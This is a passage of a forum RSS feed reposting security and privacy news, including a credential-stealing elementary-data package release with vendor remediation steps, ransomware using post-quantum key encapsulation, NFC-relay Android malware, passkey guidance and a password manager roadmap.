	After a decade and a half of social media companies basically doing whatever they want with little oversight, and the negative social consequences this has caused such as radicalization, mental health crises, and child exploitation, it is extremely unlikely that the UK government, or any other for that matter, is going to seriously consider this view. In fact, many governments globally are now taking much tougher action against Big Tech after <a automate_uuid="f663f12b-084b-4cae-b6f1-bff2ac8d8a94" href="https://www.neowin.net/news/starmer-slams-tech-giants-as-uk-prepares-a-major-crackdown-on-social-media-child-safety/" rel="external nofollow">some countries</a> have shown <a automate_uuid="e5ee157b-f82b-4bfc-89b1-0efa49e8c354" href="https://www.neowin.net/news/australia-adds-twitch-to-its-teen-social-media-ban/" rel="external nofollow">it can be done</a>.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/uk-government-ignores-data-leak-warnings-as-mps-back-online-digital-checkpoints/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Posted Wednesday 29 April 2026 at 5:25 pm AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of March) 1,297</em></span>
</p>

]]></description><guid isPermaLink="false">34771</guid><pubDate>Wed, 29 Apr 2026 07:25:49 +0000</pubDate></item><item><title>Australia pushes Google and Meta to pay local media outlets for their news</title><link>https://nsaneforums.com/news/security-privacy-news/australia-pushes-google-and-meta-to-pay-local-media-outlets-for-their-news-r34754/</link><description><![CDATA[<h3>
	If tech firms fail to reach agreements with local publishers, they could face fines of up to 2.25% of their local revenue.
</h3>

<p>
	The Australian government has introduced a new bill that would require Google, Meta, and TikTok to pay fees to local news outlets for content that appears on their platforms. The bill is intended to support local media and journalism in the country.
</p>

<p>
	 
</p>

<p>
	The News Bargaining Incentive, <a automate_uuid="bda88978-cbf3-4787-884a-858963dc27cb" href="https://www.neowin.net/news/australia-to-make-tech-giants-pay-for-using-news-content-from-local-media-publishers/" rel="external nofollow">first initiated in 2024</a>, aims to end tech companies’ free use of news produced by local media outlets and ensure they pay for the content that fuels their platforms. Companies that fail to reach agreements with local news organizations could face fines of up to 2.25% of their local revenue, which could amount to millions of dollars.
</p>

<p>
	 
</p>

<p>
	"People are increasingly getting their news directly from Facebook, from TikTok and from Google, and we believe it's only fair that large digital platforms contribute to the hard work of journalism that enriches their feeds and that drives their revenue," Australia Communications Minister Anika Wells said.
</p>

<p>
	 
</p>

<p>
	Wells also suggested that tech firms strike deals with news outlets; otherwise, they may have to pay higher fines. The proposed levy would take effect on July 1. It would also apply to companies that hold a significant share of Australia's online search market and generate up to A$250 million ($179.3 million) in local revenue. The bill does not include artificial intelligence platforms, but it does apply to companies such as Google, Meta, and TikTok.
</p>

<p>
	 
</p>

<p>
	Executives from some of Australia’s largest media outlets called the latest initiative a “critical step toward securing the future of Australian news,” adding that “If digital platforms fail to pay for the use of the news content from which they profit, then journalism becomes unsustainable.”
</p>

<p>
	 
</p>

<p>
	Australia is not the first country to try to make tech firms pay for the news they use on their platforms. <a automate_uuid="d41d9a2a-0344-4fa5-9dd0-7204c7368927" href="https://www.neowin.net/news/google-agrees-to-pay-canada-100-million-cad-per-year-to-comply-with-its-online-news-act/" rel="external nofollow">Google previously paid nearly $100 million to Canadian news outlets</a> to be exempt from the Online News Act.
</p>

<p>
	 
</p>

<p>
	Via: <a automate_uuid="29dd5f37-b872-412f-8a98-d736925318eb" href="https://www.reuters.com/business/media-telecom/australia-charge-big-tech-companies-2-levy-unless-they-strike-local-news-deals-2026-04-28/" rel="external nofollow">Reuters</a>
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/australia-pushes-google-and-meta-to-pay-local-media-outlets-for-their-news/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Posted Wednesday 29 April 2026 at 7:28 am AEST (my time).</em></span>
</p>
]]></description><guid isPermaLink="false">34754</guid><pubDate>Tue, 28 Apr 2026 21:28:57 +0000</pubDate></item><item><title>Open source package with 1 million monthly downloads stole user credentials</title><link>https://nsaneforums.com/news/security-privacy-news/open-source-package-with-1-million-monthly-downloads-stole-user-credentials-r34748/</link><description><![CDATA[<h3>
	If you’re one of millions using element-data, it’s time to check for compromise.
</h3>

<p>
	Open source software with more than 1 million monthly downloads was compromised after a threat actor exploited a vulnerability in the developers’ account workflow that gave access to its signing keys and other sensitive information.
</p>

<p>
	 
</p>

<p>
	On Friday, unknown attackers exploited the vulnerability to push a new version of <a href="https://github.com/elementary-data/elementary/pkgs/container/elementary" rel="external nofollow">element-data</a>, a command-line interface that helps users monitor performance and anomalies in machine-learning systems. When run, the malicious package scoured systems for sensitive data, including user profiles, warehouse credentials, cloud provider keys, API tokens, and SSH keys, developers <a href="https://www.elementary-data.com/post/security-incident-report-malicious-release-of-elementary-oss-python-cli-v0-23-3" rel="external nofollow">said</a>. The malicious version was tagged as 0.23.3 and was published to the developers’ Python Package Index and Docker image accounts. It was removed about 12 hours later, on Saturday. Elementary Cloud, the Elementary dbt package, and all other CLI versions weren’t affected.
</p>

<h2>
	Assume compromise
</h2>

<p>
	“Users who installed 0.23.3, or who pulled and ran the affected Docker image, should assume that any credentials accessible to the environment where it ran may have been exposed,” the developers wrote.
</p>

<p>
	 
</p>

<p>
	The threat actor gained access to the developers’ account by exploiting a vulnerability in a GitHub action they created. By posting malicious code to a pull request, the attackers were able to run a bash script that ran inside the developer’s account. The bash script retrieved the sensitive data. With the account tokens and signing keys, the attacker went on to publish a malicious element-data package that was nearly indistinguishable from a legitimate one.
</p>

<p>
	 
</p>

<p>
	The developers learned of the compromise from a third-party <a href="https://github.com/elementary-data/elementary/issues/2205" rel="external nofollow">issue report</a>. Within three hours, the package was removed. Element developers said they also rotated all credentials that the malicious code had access to. They have further fixed the vulnerability and audited all their other GitHub actions to ensure none contain the same flaw.
</p>

<p>
	 
</p>

<p>
	The developers are urging everyone who installed version 0.23.3 to take the following steps immediately:
</p>

<blockquote class="QuoteNewsStyle">
	<p>
		1. Check your installed version:
	</p>

	<p>
		 
	</p>

	<p>
		<code>pip show elementary-data | grep Version</code>
	</p>

	<p>
		 
	</p>

	<p>
		2. If the version is 0.23.3, uninstall it and replace it with the safe version:
	</p>

	<p>
		 
	</p>

	<p>
		<code>pip uninstall elementary-data</code>
	</p>

	<p>
		 
	</p>

	<p>
		<code>pip install elementary-data==0.23.4</code>
	</p>

	<p>
		 
	</p>

	<p>
		In your requirements and lockfiles, pin explicitly to elementary-data==0.23.4.
	</p>

	<p>
		 
	</p>

	<p>
		3. Delete your cache files to avoid any artifacts.
	</p>

	<p>
		 
	</p>

	<p>
		4. Check for the malware’s marker file on any machine where the CLI may have run: if this file is present, the payload executed on that machine.
	</p>

	<p>
		 
	</p>

	<p>
		<code>macOS / Linux: /tmp/.trinny-security-update</code>
	</p>

	<p>
		 
	</p>

	<p>
		<code>Windows: %TEMP%\.trinny-security-update</code>
	</p>

	<p>
		 
	</p>

	<p>
		5. Rotate any credentials that were accessible from the environment where 0.23.3 ran – dbt profiles, warehouse credentials, cloud provider keys, API tokens, SSH keys, and the contents of any .env files. CI/CD runners are especially exposed because they typically have broad sets of secrets mounted at runtime.
	</p>

	<p>
		 
	</p>

	<p>
		6. Contact your security team to hunt for unauthorized usage of exposed credentials. The relevant IOCs are <a href="https://www.elementary-data.com/post/security-incident-report-malicious-release-of-elementary-oss-python-cli-v0-23-3" rel="external nofollow">at the bottom of this post</a>.
	</p>
</blockquote>

<p>
	Over the past decade, supply-chain attacks on open source repositories have become increasingly common. In some cases they have produced a chain of compromises: the malicious package breaches the environments of its users, and those compromised environments are then used to breach others.
</p>

<p>
	 
</p>

<p>
	HD Moore, a hacker with more than four decades of experience and the founder and CEO of runZero, said that user-developed repository workflows, such as GitHub actions, are notorious for hosting vulnerabilities.
</p>

<p>
	 
</p>

<p>
	It’s “a major problem for open source projects with open repos,” he said. “It’s really hard to not accidentally create dangerous workflows that can be exploited by an attacker’s pull request.”
</p>

<p>
	 
</p>

<p>
	He said <a href="https://github.com/zizmorcore/zizmor" rel="external nofollow">this package</a>, zizmor, can be used to check workflows for such vulnerabilities.
</p>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/security/2026/04/open-source-package-with-1-million-monthly-downloads-stole-user-credentials/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Posted Tuesday 28 April 2026 at 12:49 pm AEST (my time).</em></span>
</p>
]]></description><guid isPermaLink="false">34748</guid><pubDate>Tue, 28 Apr 2026 02:50:46 +0000</pubDate></item><item><title>Say goodbye to passwords as UK cyber experts crown passkeys the new security king</title><link>https://nsaneforums.com/news/security-privacy-news/say-goodbye-to-passwords-as-uk-cyber-experts-crown-passkeys-the-new-security-king-r34739/</link><description><![CDATA[<h3>
	In a major shift, the NCSC now urges everyone to ditch vulnerable passwords for passkeys to build a safer and simpler digital future starting today.
</h3>

<p>
	GCHQ’s National Cyber Security Centre (NCSC) has just updated its guidance. It is now recommending that <a automate_uuid="81578f18-8f2c-4816-8951-e16070f15e8b" href="https://www.neowin.net/news/microsoft-entra-id-to-auto-enable-passkey-profiles-and-synced-passkeys-in-march-2026/" rel="external nofollow">consumers should pick passkeys</a>, rather than passwords, as their first login choice across all digital services. The decision was announced on Thursday, and it is notable because the NCSC is the UK government's technical authority on cyber security.
</p>

<p>
	 
</p>

<p>
	The recommendation is a change from last year when the NCSC stopped short of endorsing adoption due to some key implementation challenges. Thanks to <a automate_uuid="593ada37-ea69-4d65-8463-b156d4751860" href="https://www.neowin.net/news/microsoft-edge-can-now-store-and-sync-passkeys-across-devices/" rel="external nofollow">progress made since then</a>, it is now recommending the technology to the public as a more secure and user-friendly login method. It also calls on businesses to use it as the default authentication option to offer to consumers.
</p>

<p>
	 
</p>

<p>
	Commenting on passkeys, Jonathan Ellison, Director of National Resilience at NCSC, <a automate_uuid="bd973508-a1e8-4a7e-9021-3c8bad735d63" href="https://www.ncsc.gov.uk/news/ncsc-leave-passwords-in-the-past-passkeys-are-the-future" rel="external nofollow">said</a>:
</p>

<p>
	 
</p>

<p style="margin-left:40px">
	<em>“Adopting passkeys wherever you can is a strong step towards a safer, simpler login experience and I am pleased that we can now support uptake.</em>
</p>

<p>
	 
</p>

<p style="margin-left:40px">
	<em>The headaches that remembering passwords have caused us for decades no longer need to be a part of logging in where users migrate to passkeys – they are a user-friendly alternative which provide stronger overall resilience.</em>
</p>

<p>
	 
</p>

<p style="margin-left:40px">
	<em>As we aim to accelerate the UK’s cyber defences at scale, moving to passkeys is something all of us can do to improve the security of everyday digital services and be prepared for modern and future cyber threats.”</em>
</p>

<p>
	 
</p>

<p>
	While passkeys may be stronger for the general public, they’re simply not as common as passwords yet, and likely won’t be for a very long time. For those websites that don’t support passkeys yet, the advice is to use a password manager to create a strong password and to use <a automate_uuid="b944dfd9-52ee-4afe-84c8-fd49b22abba1" href="https://www.neowin.net/news/proton-launches-free-open-source-authenticator-app/" rel="external nofollow">two-factor authentication</a>.
</p>

<p>
	 
</p>

<p>
	The UK government said last year that it would roll out passkeys for its digital services as an alternative to SMS-based verification. It expects this to save millions of pounds annually.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/say-goodbye-to-passwords-as-uk-cyber-experts-crown-passkeys-the-new-security-king/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Posted Monday 27 April 2026 at 3:40 pm AEST (my time).</em></span>
</p>
]]></description><guid isPermaLink="false">34739</guid><pubDate>Mon, 27 Apr 2026 05:42:02 +0000</pubDate></item><item><title>Proton Pass is getting folders, an SSH agent, and other features later this year</title><link>https://nsaneforums.com/news/security-privacy-news/proton-pass-is-getting-folders-an-ssh-agent-and-other-features-later-this-year-r34713/</link><description><![CDATA[<h3>
	Proton says it will need to rework its cryptography model to support folders, with biometric unlock coming to the extension later this year.
</h3>

<p>
	The Proton team has released the spring and summer roadmap for their password manager, Proton Pass, bringing several improvements, like folders and a new SSH agent, among others.
</p>

<p>
	 
</p>

<p>
	Starting with folders, Proton says this feature will "require some rethinking of our cryptography model" and expects it to be available in the coming months. When it launches, you will be able to organize your credentials and notes into dedicated folders and even subfolders, and then share those specific folders just like you already can with individual items or entire vaults.
</p>

<p>
	 
</p>

<p>
	Last June, Proton rolled out support for Custom Items, allowing users to create specific templates for storing unique data formats such as Wi-Fi network credentials, passports, licenses, and, of course, SSH keys.
</p>

<p>
	 
</p>

<p>
	Now, Proton says it is working on an SSH agent that lets you use those SSH keys already stored in your vault for your actual Git and terminal workflows. This feature will bring it up to par with more established password managers like 1Password and Bitwarden, which developers have used for this exact purpose for some time. The goal is to let you authenticate SSH sessions or sign Git commits using a simple biometric prompt from the desktop app, keeping the private keys off your local disk.
</p>

<p>
	 
</p>

<p>
	The Proton Pass extension is getting support for biometric unlock, using your computer's fingerprint sensor or Face ID. The initial rollout will be limited to macOS and Chromium-based browsers, with support for more platforms and browsers to follow later. Other <a automate_uuid="823b57be-c4b4-4c80-8c13-c7cf1cc27538" href="https://proton.me/blog/pass-roadmap-spring-summer-2026" rel="external nofollow">updates</a> Proton is making to the extension include adding iFrame autofill support to handle login forms embedded on complicated sites, like banking portals, and a full offline mode.
</p>

<p>
	 
</p>

<p>
	<a automate_uuid="388369fa-1486-4fa0-a4bf-887e6e8b521d" href="https://www.neowin.net/news/proton-launches-its-password-manager-proton-pass-now-available-for-download/" rel="external nofollow">Since its launch</a> in mid-2023, Proton has been aggressively pushing updates to Proton Pass. Throughout 2024 and 2025, the password manager got neat features like full passkey support, dedicated desktop apps for <a automate_uuid="66d461ef-55f3-473a-abc6-0644452ade0b" href="https://www.neowin.net/news/the-proton-pass-for-windows-app-finally-launches-with-the-addition-of-an-offline-mode/" rel="external nofollow">Windows</a>, <a automate_uuid="af05d43c-cd2f-461d-ad2f-8081cef3cf50" href="https://www.neowin.net/news/proton-launches-proton-pass-on-macos-and-linux/" rel="external nofollow">macOS, and Linux</a>, the <a automate_uuid="53de9392-6e81-4d44-9a1c-45023dff7fa5" href="https://www.neowin.net/news/the-proton-pass-password-manager-adds-pass-monitor-for-better-identity-protection/" rel="external nofollow">Pass Monitor security dashboard</a>, <a automate_uuid="8d0ad0fd-7851-4c1a-9daf-1a034316bdb3" href="https://www.neowin.net/news/proton-pass-now-lets-you-securely-share-passwords-with-anyone/" rel="external nofollow">Secure Links</a> for sharing with non-users, encrypted file attachments, custom item types, and even a <a automate_uuid="0b7ae4c4-2232-48e1-af3e-683917e86787" href="https://www.neowin.net/news/proton-pass-gets-brand-spanking-new-cli-client-available-now-to-a-limited-subset-of-testers/" rel="external nofollow">command-line interface</a>.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/proton-pass-is-getting-folders-an-ssh-agent-and-other-features-later-this-year/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Posted Saturday 25 April 2026 at 7:50 am AEST (my time).</em></span>
</p>
]]></description><guid isPermaLink="false">34713</guid><pubDate>Fri, 24 Apr 2026 21:50:37 +0000</pubDate></item><item><title>In a first, a ransomware family is confirmed to be quantum-safe</title><link>https://nsaneforums.com/news/security-privacy-news/in-a-first-a-ransomware-family-is-confirmed-to-be-quantum-safe-r34705/</link><description><![CDATA[<h3>
	Technically speaking, there’s no practical benefit to using PQC. So why is it being used?
</h3>

<p>
	A relatively new ransomware family is using a novel approach to hype the strength of the encryption used to scramble files: making it, or at least claiming it is, protected against attacks by quantum computers.
</p>

<p>
	 
</p>

<p>
	Kyber, as the ransomware is called, has been around since at least <a href="https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/kyber" rel="external nofollow">last September</a> and quickly <a href="https://cyber.netsecops.io/articles/new-kyber-ransomware-strain-discovered-with-advanced-encryption/?utm_me%E2%80%A6=" rel="external nofollow">attracted attention</a> for the claim that it used <a href="https://csrc.nist.gov/pubs/fips/203/final" rel="external nofollow">ML-KEM</a>, short for Module-Lattice-Based Key-Encapsulation Mechanism, a standard shepherded by the National Institute of Standards and Technology. The ransomware takes its name from Kyber, the original name of the algorithm that became ML-KEM. For the rest of the article, Kyber refers to the ransomware; the algorithm is referred to as ML-KEM.
</p>

<h2>
	It’s all about marketing
</h2>

<p>
	ML-KEM is an asymmetric method for establishing shared keys (a key encapsulation mechanism). Its security rests on problems based on lattices, mathematical structures for which quantum computers have no known advantage over classical computers. ML-KEM is designed to replace elliptic curve and RSA cryptosystems, both of which are based on problems that quantum computers of sufficient strength can tackle.
</p>

<p>
	 
</p>

<p>
	On Tuesday, security firm Rapid7 <a href="https://www.rapid7.com/blog/post/tr-kyber-ransomware-double-trouble-windows-esxi-attacks-explained/" rel="external nofollow">said</a> it reverse-engineered Kyber and found that the Windows variant used ML-KEM1024, the highest strength version of the PQC (post-quantum cryptography) standard. Kyber was using ML-KEM to conceal the key used to encrypt victims’ data with AES-256, a symmetric cryptographic standard that is also quantum-proof. (As <a href="https://arstechnica.com/security/2026/04/contrary-to-popular-superstition-aes-128-is-just-fine-in-a-post-quantum-world/" rel="external nofollow">reported previously</a>, AES-128 would have sufficed in withstanding a quantum attack.) Brett Callow, a threat analyst at security firm Emsisoft, said it’s the first confirmed case of ransomware using PQC.
</p>

<p>
	 
</p>

<p>
	There is no practical benefit for Kyber developers to have chosen a PQC key-exchange algorithm. The Kyber ransom note gives victims one week to respond. Quantum computers capable of running Shor’s algorithm, the quantum algorithm that breaks RSA and ECC (elliptic curve cryptography), are, at a minimum, three years away and likely much further.
</p>

<p>
	 
</p>

<p>
	A Kyber variant that targets systems running VMware, meanwhile, claims to use ML-KEM as well. Rapid7 said its look under the hood revealed that, in fact, it uses RSA with 4096-bit keys, a strength that will take even longer for Shor’s algorithm to break. Anna Širokova, a Rapid7 senior security researcher and the author of Tuesday’s post, said the use or claimed use of ML-KEM is likely just a branding gimmick and that implementing it required relatively little work by Kyber developers.
</p>

<p>
	 
</p>

<p>
	In an email, Širokova wrote:
</p>

<blockquote class="QuoteNewsStyle">
	<p>
		<span style="font-weight: 400;">First, it’s marketing to the victim. “Post-quantum encryption” sounds a lot scarier than “we used AES,” especially to non-technical decision-makers who might be evaluating whether to pay. It’s a psychological trick. They’re not worried about someone breaking the encryption a decade from now. They want payment within 72 hours.</span>
	</p>

	<p>
		 
	</p>

	<p>
		<span style="font-weight: 400;">Second, implementation cost is low. Kyber1024 libraries (renamed to ML-KEM) are available and well-documented. Ransomware doesn’t encrypt your files directly with Kyber1024. That would be slow. Instead, it:</span>
	</p>

	<p>
		 
	</p>

	<ol>
		<li aria-level="1" style="font-weight: 400;">
			<span style="font-weight: 400;">Generates a random AES key</span>
		</li>
		<li aria-level="1" style="font-weight: 400;">
			<span style="font-weight: 400;">Encrypts your files with that AES key (fast)</span>
		</li>
		<li aria-level="1" style="font-weight: 400;">
			<span style="font-weight: 400;">Encrypts </span><i><span style="font-weight: 400;">that AES key</span></i><span style="font-weight: 400;"> with Kyber1024 (so only the attacker can decrypt it)</span>
		</li>
	</ol>

	<p>
		 
	</p>

	<p>
		<span style="font-weight: 400;">In Rust, there are already libraries that do Kyber1024. The developer just adds it to their dependencies and calls a function to wrap the key.</span>
	</p>
</blockquote>

<p>
	Despite the hype, Kyber suggests that PQC is attracting the attention of less technically inclined attorneys and executives deciding how to respond to ransom demands. Kyber developers are hoping the impression that the encryption has overwhelming strength will sway people to pay.
</p>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/security/2026/04/now-even-ransomware-is-using-post-quantum-cryptography/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Posted Friday 24 April 2026 at 4:10 pm AEST (my time).</em></span>
</p>
]]></description><guid isPermaLink="false">34705</guid><pubDate>Fri, 24 Apr 2026 06:11:15 +0000</pubDate></item><item><title>Microsoft says Windows 11&#x2019;s built-in 'Defender' antivirus is "usually sufficient" for most PC users: "I haven't used a 3rd party antivirus since XP"</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-says-windows-11%E2%80%99s-built-in-defender-antivirus-is-usually-sufficient-for-most-pc-users-i-havent-used-a-3rd-party-antivirus-since-xp-r34684/</link><description><![CDATA[<h3>
	The company says Defender is enough for most users, provided default protections stay on and updates are installed regularly.
</h3>

<p id="elk-fa1a4d7e-2d1e-4525-8bd6-2a44c415965a">
	In a world where bad actors are increasingly adopting sophisticated techniques to deploy malicious attacks, including turning <a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/artificial-intelligence" data-before-rewrite-redirect="https://www.windowscentral.com/tag/artificial-intelligence" data-hl-processed="none" data-mrf-recirculation="inline-link" data-url="https://www.windowscentral.com/artificial-intelligence" href="https://www.windowscentral.com/artificial-intelligence" rel="external nofollow">artificial intelligence</a> against unsuspecting users, it feels like a no-brainer to have some kind of antivirus installed on your device.
</p>

<p>
	 
</p>

<p>
	Having an antivirus installed helps protect you against malware, phishing attacks, and ransomware that can give hackers unauthorized access to sensitive data. Luckily, Microsoft ships Windows 11 with <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/software-apps/windows-11/how-to-get-started-with-microsoft-defender-antivirus-on-windows-11" data-hl-processed="none" data-mrf-recirculation="inline-link" data-url="https://www.windowscentral.com/software-apps/windows-11/how-to-get-started-with-microsoft-defender-antivirus-on-windows-11" href="https://www.windowscentral.com/software-apps/windows-11/how-to-get-started-with-microsoft-defender-antivirus-on-windows-11" rel="external nofollow">Microsoft Defender</a> as an in-box app to help curb such issues and provide users with real-time protection and advanced features designed to keep their system secure.
</p>

<p>
	 
</p>

<p aria-hidden="true" id="elk-fa1a4d7e-2d1e-4525-8bd6-2a44c415965a-2">
	<em>“For many Windows 11 users, Microsoft Defender Antivirus covers everyday risk without requiring additional software,”</em> Microsoft indicated in <a data-analytics-id="inline-link" data-hl-processed="none" data-mrf-recirculation="inline-link" data-url="https://www.microsoft.com/en-us/windows/learning-center/best-antivirus-software-for-windows#wl" href="https://www.microsoft.com/en-us/windows/learning-center/best-antivirus-software-for-windows#wl" referrerpolicy="no-referrer-when-downgrade" target="_blank" rel="external nofollow">a Learning Center article </a>earlier this month (via <a data-analytics-id="inline-link" data-hl-processed="none" data-mrf-recirculation="inline-link" data-url="https://www.windowslatest.com/2026/04/21/microsoft-quietly-reveals-whether-you-need-a-third-party-antivirus-software-in-windows-11/" href="https://www.windowslatest.com/2026/04/21/microsoft-quietly-reveals-whether-you-need-a-third-party-antivirus-software-in-windows-11/" referrerpolicy="no-referrer-when-downgrade" target="_blank" rel="external nofollow">Windows Latest</a>). This seems to have been fuelled by users going the extra mile to install third-party antivirus software on their devices to handle the same task.
</p>

<p>
	 
</p>

<p aria-hidden="true">
	Microsoft's response to skeptics questioning Defender's capabilities is simple and clear: <em>“Windows antivirus protection is usually sufficient when Windows 11 runs with default protections enabled, updates are installed regularly, and software downloads are deliberate.” </em>
</p>

<p>
	 
</p>

<p aria-hidden="true">
	However, the tech giant hasn't completely written off the value of third-party antivirus software, especially depending on how you use your Windows PC and the features you value.
</p>

<figure id="elk-b27ae615-44e7-489f-b97a-738e4b3df217">
	<blockquote class="QuoteNewsStyle">
		<p>
			The choice to add third‑party antivirus depends on how you use your PC and which features you value. You might consider extra security software if you manage multiple devices, share devices with family members, or want services like identity monitoring or parental controls.
		</p>

		<p>
			 
		</p>

		<p>
			<em><cite>Microsoft</cite></em>
		</p>
	</blockquote>
</figure>

<p id="elk-e13f36a1-f8fe-4319-945f-6b3b3f840b4e">
	Why not run multiple antivirus programs on your Windows PC, including Microsoft Defender? The company warned that it may cause system conflicts and stress your device's resources.
</p>

<p>
	 
</p>

<hr>
<p>
	 
</p>

<p id="elk-c5386f19-993b-4132-b3c1-0dae79db1cd7">
	Microsoft also warned users against over-reliance on third-party antivirus software, citing that <em>“each added tool increases background activity and complexity, so choose tools that match real needs.”</em> As expected, the company used the opportunity to toot its own horn, highlighting the benefits of using Microsoft Defender as your default antivirus in Windows 11, including anti-phishing and ransomware protection.
</p>

<p>
	 
</p>

<p>
	I did some brief groundwork to see what the community thinks about Microsoft Defender in Windows 11. In the <a data-analytics-id="inline-link" data-hl-processed="none" data-mrf-recirculation="inline-link" data-url="https://www.reddit.com/r/Windows11/comments/1ol2h6d/new_windows_11_laptop_needs_antivirus_or_not/" href="https://www.reddit.com/r/Windows11/comments/1ol2h6d/new_windows_11_laptop_needs_antivirus_or_not/" referrerpolicy="no-referrer-when-downgrade" target="_blank" rel="external nofollow">r/Windows11 subreddit</a> on <a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/tag/reddit" data-hl-processed="none" data-mrf-recirculation="inline-link" data-url="https://www.windowscentral.com/tag/reddit" href="https://www.windowscentral.com/tag/reddit" rel="external nofollow">Reddit</a>, a user asked whether they would need a third-party antivirus or whether Microsoft Defender would suffice.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p id="elk-3d35bf23-d730-40c3-9c42-7fc18f4c7e6d">
	Everyone in the comment section pretty much said the same thing: Microsoft Defender is enough and works just fine. <em>"I haven't used a 3rd party antivirus since XP,"</em> a user indicated.<em> "Windows Defender is enough and maybe even too much," </em>another user added.
</p>

<p>
	 
</p>

<p>
	<em><strong>Do you use Microsoft Defender on Windows 11? Let me know in the comments.</strong></em>
</p>

<p>
	 
</p>

<p>
	<a href="https://www.windowscentral.com/microsoft/windows-11/microsoft-says-windows-11s-built-in-defender-antivirus-is-usually-sufficient-for-most-pc-users" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Posted Thursday 23 April 2026 at 7:35 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of March) 1,297</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">34684</guid><pubDate>Wed, 22 Apr 2026 21:39:58 +0000</pubDate></item><item><title>Android malware NGate steals NFC data through HandyPay app</title><link>https://nsaneforums.com/news/security-privacy-news/android-malware-ngate-steals-nfc-data-through-handypay-app-r34677/</link><description><![CDATA[<p>
	<span style="font-size:14px;"><strong>A trojanized HandyPay application is being used by threat actors to grab the NFC payment data of Android users.</strong></span>
</p>

<p>
	 
</p>

<p>
	A campaign that began in November 2025 and targets Android users in Brazil is still active and growing at an alarming rate. ESET researchers have<span> </span><a href="https://www.welivesecurity.com/en/eset-research/new-ngate-variant-hides-in-a-trojanized-nfc-payment-app/" rel="external nofollow">discovered</a><span> </span>a new variant of the NGate malware family that uses a trojanized version of the HandyPay application to steal the NFC payment data of Android users. Research suggests that the malware's source code was written with the help of generative AI.
</p>

<p>
	 
</p>

<p>
	The threat actors are mainly targeting Android users in Brazil, as ESET found while analyzing the attackers' C&amp;C server. The trojanized app is widely circulated through a fake website impersonating a Brazilian lottery, "Rio de Prêmios", as well as through a fake Google Play page. When asked about this, HandyPay confirmed that an internal investigation is ongoing on its side.
</p>

<p>
	 
</p>


	<a href="https://cdn.neowin.com/news/images/uploaded/2026/04/1776771952_codelog.webp" rel="external nofollow"><img alt="Code snippet of the Ngate malware" data-ratio="75.10" height="475" width="776" src="https://cdn.neowin.com/news/images/uploaded/2026/04/1776771952_codelog.webp" /></a>

	
		<p>
			Code snippet - Image via ESET
		</p>

		<p>
			 
		</p>
	


<p>
	Generative AI is increasingly being used to develop malware. As seen in the code snippet above, the malware's log messages contain emojis, which are common in AI-generated text. This suggests that LLMs were used to generate or modify the code, although there is no conclusive proof.
</p>

<p>
	 
</p>


	<img alt="1776772162_trojan_flow.webp" class="ipsImage" data-ratio="75.10" height="384" width="720" src="https://cdn.neowin.com/news/images/uploaded/2026/04/1776772162_trojan_flow.webp" />
	
		<p>
			Image via ESET
		</p>

		<p>
			 
		</p>
	


<p>
	The attack starts on the lottery page, where the victim clicks the button to claim the prize and installs the trojanized HandyPay APK. Once installed, the APK behaves like the original application, which makes it difficult for the user to notice anything unusual. The user is then asked to enter the card's PIN into the app and tap the card against the back of the NFC-enabled smartphone. In the background, the malware collects the victim's payment and card data and relays it to the attacker, who can then use the relayed data to perform contactless transactions and withdraw cash from ATMs.
</p>

<p>
	 
</p>

<p>
	Explaining the mechanism, ESET said, "The operator’s device is linked to an email address hardcoded within the malicious app, ensuring that all captured NFC traffic is routed exclusively to the attacker. We have observed two different attacker email addresses being used in the analyzed samples. On top of the standard batch of data that is transferred in the NFC relay, the victim’s payment card PIN is exfiltrated separately to a dedicated C&amp;C server over HTTP, not relying on HandyPay infrastructure. The C&amp;C endpoint for PIN harvesting also functions as the distribution server, centralizing both delivery and data-collection operations".
</p>

<p>
	 
</p>

<p>
	With NFC payments growing in use, experts warn users to be wary of such attacks and to install applications only from official sources. The use of generative AI also raises the concern that even a person without technical expertise could attack payment systems.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/android-malware-ngate-steals-nfc-data-through-handypay-app/" rel="external nofollow">Source</a>
</p>
]]></description><guid isPermaLink="false">34677</guid><pubDate>Wed, 22 Apr 2026 18:58:21 +0000</pubDate></item><item><title>Claude Desktop changes app access settings for browsers you don't even have installed yet</title><link>https://nsaneforums.com/news/security-privacy-news/claude-desktop-changes-app-access-settings-for-browsers-you-dont-even-have-installed-yet-r34676/</link><description><![CDATA[<h2>
	Installation and pre-approval without consent looks dubious under EU law
</h2>

<p>
